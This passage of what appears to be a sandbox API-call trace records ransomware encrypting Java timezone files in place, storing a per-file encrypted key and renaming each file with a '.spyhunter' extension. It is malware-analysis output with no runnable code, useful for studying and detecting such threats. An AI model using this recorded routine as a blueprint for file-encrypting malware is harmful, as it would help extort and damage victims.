GetProcessHeap () returned 0x2c0000 [0167.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.740] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.740] WriteFile (in: hFile=0x9c, lpBuffer=0x248e614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x248e614*, lpNumberOfBytesWritten=0x248e5d4*=0x4, lpOverlapped=0x0) returned 1 [0167.740] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5d4*=0x30, lpOverlapped=0x0) returned 1 [0167.740] CloseHandle (hObject=0x9c) returned 1 [0167.740] GetProcessHeap () returned 0x2c0000 [0167.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.740] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos.spyhunter") returned 71 [0167.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos.spyhunter")) returned 1 [0167.829] GetProcessHeap () returned 0x2c0000 [0167.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.829] GetProcessHeap () returned 0x2c0000 [0167.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.829] GetProcessHeap () returned 0x2c0000 [0167.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4750 | out: hHeap=0x2c0000) returned 1 [0167.829] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e618 | out: pbBuffer=0x248e618) returned 1 [0167.830] GetProcessHeap () returned 0x2c0000 [0167.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e610*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e610*=0x30) returned 1 [0167.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.831] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland") returned 60 [0167.831] StrStrW (lpFirst="Auckland", lpSrch=".txt") returned 0x0 [0167.831] GetProcessHeap () returned 0x2c0000 [0167.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.831] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5d4*=0x544, lpOverlapped=0x0) returned 1 [0167.906] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffabc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.906] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x544, lpNumberOfBytesWritten=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5d4*=0x544, lpOverlapped=0x0) returned 1 [0167.906] GetProcessHeap () returned 0x2c0000 [0167.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.906] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.906] WriteFile (in: hFile=0x9c, lpBuffer=0x248e614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x248e614*, lpNumberOfBytesWritten=0x248e5d4*=0x4, lpOverlapped=0x0) returned 1 [0167.907] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5d4*=0x30, lpOverlapped=0x0) returned 1 [0167.907] CloseHandle (hObject=0x9c) returned 1 [0167.907] GetProcessHeap () returned 0x2c0000 [0167.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.907] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland.spyhunter") returned 70 [0167.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Auckland.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\auckland.spyhunter")) returned 1 [0167.908] GetProcessHeap () returned 0x2c0000 [0167.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.909] GetProcessHeap () returned 0x2c0000 [0167.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.909] GetProcessHeap () returned 0x2c0000 [0167.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc370 | out: hHeap=0x2c0000) returned 1 [0167.909] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e610 | out: pbBuffer=0x248e610) returned 1 [0167.909] GetProcessHeap () returned 0x2c0000 [0167.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.909] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e608*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e608*=0x30) returned 1 [0167.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.910] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna") returned 57 [0167.910] StrStrW (lpFirst="Vienna", lpSrch=".txt") returned 0x0 [0167.910] GetProcessHeap () returned 0x2c0000 [0167.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.910] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5cc*=0x4b0, lpOverlapped=0x0) returned 1 [0167.945] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.946] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5cc*=0x4b0, lpOverlapped=0x0) returned 1 [0167.946] GetProcessHeap () returned 0x2c0000 [0167.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.946] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.946] WriteFile (in: hFile=0x9c, lpBuffer=0x248e60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x248e60c*, lpNumberOfBytesWritten=0x248e5cc*=0x4, lpOverlapped=0x0) returned 1 [0167.946] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5cc*=0x30, lpOverlapped=0x0) returned 1 [0167.946] CloseHandle (hObject=0x9c) returned 1 [0167.949] GetProcessHeap () returned 0x2c0000 [0167.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.949] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna.spyhunter") returned 67 [0167.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna.spyhunter")) returned 1 [0167.950] GetProcessHeap () returned 0x2c0000 [0167.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.951] GetProcessHeap () returned 0x2c0000 [0167.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.951] GetProcessHeap () returned 0x2c0000 [0167.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2c80 | out: hHeap=0x2c0000) returned 1 [0167.951] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e610 | out: pbBuffer=0x248e610) returned 1 [0167.951] GetProcessHeap () returned 0x2c0000 [0167.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.951] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e608*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e608*=0x30) returned 1 [0167.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.952] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn") returned 58 [0167.952] StrStrW (lpFirst="Tallinn", lpSrch=".txt") returned 0x0 [0167.952] GetProcessHeap () returned 0x2c0000 [0167.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.953] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5cc*=0x438, lpOverlapped=0x0) returned 1 [0167.958] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbc8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.958] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x438, lpNumberOfBytesWritten=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5cc*=0x438, lpOverlapped=0x0) returned 1 [0167.958] GetProcessHeap () returned 0x2c0000 [0167.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.958] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.958] WriteFile (in: hFile=0x9c, lpBuffer=0x248e60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x248e60c*, lpNumberOfBytesWritten=0x248e5cc*=0x4, lpOverlapped=0x0) returned 1 [0167.959] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5cc*=0x30, lpOverlapped=0x0) returned 1 [0167.959] CloseHandle (hObject=0x9c) returned 1 [0167.991] GetProcessHeap () returned 0x2c0000 [0167.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.992] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn.spyhunter") returned 68 [0167.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn.spyhunter")) returned 1 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2980 | out: hHeap=0x2c0000) returned 1 [0167.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e608 | out: pbBuffer=0x248e608) returned 1 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e600*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e600*=0x30) returned 1 [0167.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.994] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia") returned 56 [0167.994] StrStrW (lpFirst="Sofia", lpSrch=".txt") returned 0x0 [0167.994] GetProcessHeap () returned 0x2c0000 [0167.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.994] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5c4*=0x440, lpOverlapped=0x0) returned 1 [0167.996] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.996] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5c4*=0x440, lpOverlapped=0x0) returned 1 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.996] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.996] WriteFile (in: hFile=0x9c, lpBuffer=0x248e604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x248e604*, lpNumberOfBytesWritten=0x248e5c4*=0x4, lpOverlapped=0x0) returned 1 [0167.996] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5c4*=0x30, lpOverlapped=0x0) returned 1 [0167.996] CloseHandle (hObject=0x9c) returned 1 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.996] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia.spyhunter") returned 66 [0167.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia.spyhunter")) returned 1 [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.998] GetProcessHeap () returned 0x2c0000 [0167.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.998] GetProcessHeap () returned 0x2c0000 [0167.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec28c0 | out: hHeap=0x2c0000) returned 1 [0167.998] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e608 | out: pbBuffer=0x248e608) returned 1 [0167.998] GetProcessHeap () returned 0x2c0000 [0167.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e600*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e600*=0x30) returned 1 [0167.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.999] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol") returned 61 [0167.999] StrStrW (lpFirst="Simferopol", lpSrch=".txt") returned 0x0 [0167.999] GetProcessHeap () returned 0x2c0000 [0167.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.999] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5c4*=0x428, lpOverlapped=0x0) returned 1 [0168.067] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.067] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x428, lpNumberOfBytesWritten=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5c4*=0x428, lpOverlapped=0x0) returned 1 [0168.068] GetProcessHeap () returned 0x2c0000 [0168.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.068] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.068] WriteFile (in: hFile=0x9c, lpBuffer=0x248e604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x248e604*, lpNumberOfBytesWritten=0x248e5c4*=0x4, lpOverlapped=0x0) returned 1 [0168.068] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5c4*=0x30, lpOverlapped=0x0) returned 1 [0168.068] CloseHandle (hObject=0x9c) returned 1 [0168.068] GetProcessHeap () returned 0x2c0000 [0168.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0168.068] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol.spyhunter") returned 71 [0168.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol.spyhunter")) returned 1 [0168.069] GetProcessHeap () returned 0x2c0000 [0168.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0168.069] GetProcessHeap () returned 0x2c0000 [0168.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.069] GetProcessHeap () returned 0x2c0000 [0168.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc1e0 | out: hHeap=0x2c0000) returned 1 [0168.070] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e600 | out: pbBuffer=0x248e600) returned 1 [0168.070] GetProcessHeap () returned 0x2c0000 [0168.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.070] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5f8*=0x30) returned 1 [0168.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.070] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague") returned 57 [0168.070] StrStrW (lpFirst="Prague", lpSrch=".txt") returned 0x0 [0168.071] GetProcessHeap () returned 0x2c0000 [0168.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.071] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5bc*=0x4c0, lpOverlapped=0x0) returned 1 [0168.102] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.102] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5bc*=0x4c0, lpOverlapped=0x0) returned 1 [0168.102] GetProcessHeap () returned 0x2c0000 [0168.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.102] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.103] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x248e5fc*, lpNumberOfBytesWritten=0x248e5bc*=0x4, lpOverlapped=0x0) returned 1 [0168.103] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5bc*=0x30, lpOverlapped=0x0) returned 1 [0168.103] CloseHandle (hObject=0x9c) returned 1 [0168.103] GetProcessHeap () returned 0x2c0000 [0168.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0168.103] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague.spyhunter") returned 67 [0168.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague.spyhunter")) returned 1 [0168.104] GetProcessHeap () returned 0x2c0000 [0168.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0168.104] GetProcessHeap () returned 0x2c0000 [0168.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 